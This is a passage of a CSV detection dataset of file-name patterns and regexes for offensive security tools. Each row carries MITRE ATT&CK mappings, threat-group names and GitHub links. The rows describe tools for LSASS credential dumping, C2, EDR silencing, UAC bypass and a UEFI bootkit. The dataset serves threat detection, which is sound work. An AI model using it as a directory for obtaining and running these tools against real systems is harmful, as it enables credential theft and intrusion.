T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - 
T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\doucme.csproj*",".{0,1000}\\doucme\.csproj.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\doucme.exe*",".{0,1000}\\doucme\.exe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\doucme.sln*",".{0,1000}\\doucme\.sln.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\Download_Execute.ps1*",".{0,1000}\\Download_Execute\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Download_Execute_PS.ps1*",".{0,1000}\\Download_Execute_PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\downloadexec.lua*",".{0,1000}\\downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\Download-Execute-PS.ps1*",".{0,1000}\\Download\-Execute\-PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Dpapi.ps1*",".{0,1000}\\Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\DragonCastle.dll*",".{0,1000}\\DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DragonCastle.pdb*",".{0,1000}\\DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DragonCastle-master\*",".{0,1000}\\DragonCastle\-master\\.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DReverseClint.go*",".{0,1000}\\DReverseClint\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\DReverseServer.go*",".{0,1000}\\DReverseServer\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\dropper\dropit.py*",".{0,1000}\\dropper\\dropit\.py.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\dropper\dropper.vba*",".{0,1000}\\dropper\\dropper\.vba.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\drop-sc.py*",".{0,1000}\\drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - 
TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\DSInternals.psd1*",".{0,1000}\\DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*\duedlligence.dll*",".{0,1000}\\duedlligence\.dll.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*\dump.ps1*",".{0,1000}\\dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\dumpCredStore.ps1*",".{0,1000}\\dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in 
PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\dumpert.*",".{0,1000}\\dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" 
"*\Dumpert\*",".{0,1000}\\Dumpert\\.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\DumpIt.exe*",".{0,1000}\\DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\DumpLsass.ps1*",".{0,1000}\\DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 
- T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\DumpNParse.exe*",".{0,1000}\\DumpNParse\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\DumpPEFromMemory.sln*",".{0,1000}\\DumpPEFromMemory\.sln.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\DumpPEFromMemory.vcxproj*",".{0,1000}\\DumpPEFromMemory\.vcxproj.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\dumpSecrets.go*",".{0,1000}\\dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential
Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\DumpShellcode*",".{0,1000}\\DumpShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combines it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*\DumpSomeHashesAuto.py*",".{0,1000}\\DumpSomeHashesAuto\.py.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\DumpThatLSASS.*",".{0,1000}\\DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\DumpThatLSASS\*",".{0,1000}\\DumpThatLSASS\\.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\dumpXor.exe*",".{0,1000}\\dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 -
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\dumpXor\x64\*",".{0,1000}\\dumpXor\\x64\\.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*\ebapc_injection.exe*",".{0,1000}\\ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ebowla.py*",".{0,1000}\\ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*\EDD.exe",".{0,1000}\\EDD\.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\EDR_Detector.rs*",".{0,1000}\\EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*\edraser.py*",".{0,1000}\\edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*\EDRSilencer.c*",".{0,1000}\\EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*\EfiDSEFix.cpp*",".{0,1000}\\EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in 
order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiDSEFix.exe*",".{0,1000}\\EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuard.sln*",".{0,1000}\\EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe.c*",".{0,1000}\\EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe.h*",".{0,1000}\\EfiGuardDxe\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver 
Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\EfiGuardDxe\X64\*",".{0,1000}\\EfiGuardDxe\\X64\\.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\Egress-Assess*",".{0,1000}\\Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\Ekko.exe*",".{0,1000}\\Ekko\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\elevateit.bat*",".{0,1000}\\elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\elevator.exe -*",".{0,1000}\\elevator\.exe\s\-.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*\Elevator\target\release*",".{0,1000}\\Elevator\\target\\release.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*\ELF\portscan*",".{0,1000}\\ELF\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 